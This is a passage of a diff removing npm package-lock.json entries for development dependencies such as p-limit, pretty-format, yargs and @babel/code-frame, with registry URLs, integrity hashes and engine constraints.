"https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/p-locate/node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "node_modules/picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true, - "engines": { - "node": ">=8.6" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "dependencies": { - "find-up": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/pretty-format": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.6.1.tgz", - "integrity": "sha512-7jRj+yXO0W7e4/tSJKoR7HRIHLPPjtNaUGG2xxKQnGvPNRkgWcQ0AZX6P4KBRJN4FcTBWb3sa7DVUJmocYuoog==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/pretty-format/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "dependencies": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pure-rand": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.0.2.tgz", - "integrity": "sha512-6Yg0ekpKICSjPswYOuC5sku/TSWaRYlA0qsXqJgM/d/4pLPHPuTxK7Nbf7jFKzAeedUhR8C7K9Uv63FBsSo8xQ==", - "dev": true, - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/dubzzz" - }, - { - "type": "opencollective", - "url": "https://opencollective.com/fast-check" - } - ] - }, - "node_modules/react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "node_modules/require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/resolve": { - "version": "1.22.2", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.2.tgz", - "integrity": "sha512-Sb+mjNHOULsBv818T40qSPeRiuWLyaGMa5ewydRLFimneixmVy2zdivRl+AF6jaYPC8ERxGDmFSiqui6SfPd+g==", - "dev": true, - "dependencies": { - "is-core-module": "^2.11.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - }, - "bin": { - "resolve": "bin/resolve" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "dependencies": { - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "node_modules/sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "node_modules/slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "dependencies": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "node_modules/sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "node_modules/stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "dependencies": { - "escape-string-regexp": "^2.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "dependencies": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "dependencies": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "node_modules/to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "dependencies": { - "is-number": "^7.0.0" - }, - "engines": { - "node": ">=8.0" - } - }, - "node_modules/type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/update-browserslist-db": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.11.tgz", - "integrity": "sha512-dCwEFf0/oT85M1fHBg4F0jtLwJrutGoHSQXCh7u4o2t1drG+c0a9Flnqww6XUKSfQMPpJBRjU8d4RXB09qtvaA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - }, - "bin": { - "update-browserslist-db": "cli.js" - }, - "peerDependencies": { - "browserslist": ">= 4.21.0" - } - }, - "node_modules/v8-to-istanbul": { - "version": "9.1.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.1.0.tgz", - "integrity": "sha512-6z3GW9x8G1gd+JIIgQQQxXuiJtCXeAjp6RaPEPLv62mH3iPHPxV6W3robxtCzNErRo6ZwTmzWhsbNvjyEBKzKA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "engines": { - "node": ">=10.12.0" - } - }, - "node_modules/v8-to-istanbul/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "dependencies": { - "makeerror": "1.0.12" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "node_modules/write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || >=16.0.0" - } - }, - "node_modules/y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "node_modules/yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true, - "engines": { - "node": ">=12" - } - }, - "node_modules/yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - } - }, - "dependencies": { - "@ampproject/remapping": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", - "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", - "dev": true, - "requires": { - "@jridgewell/gen-mapping": "^0.3.0", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", - "dev": true, - "requires": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - 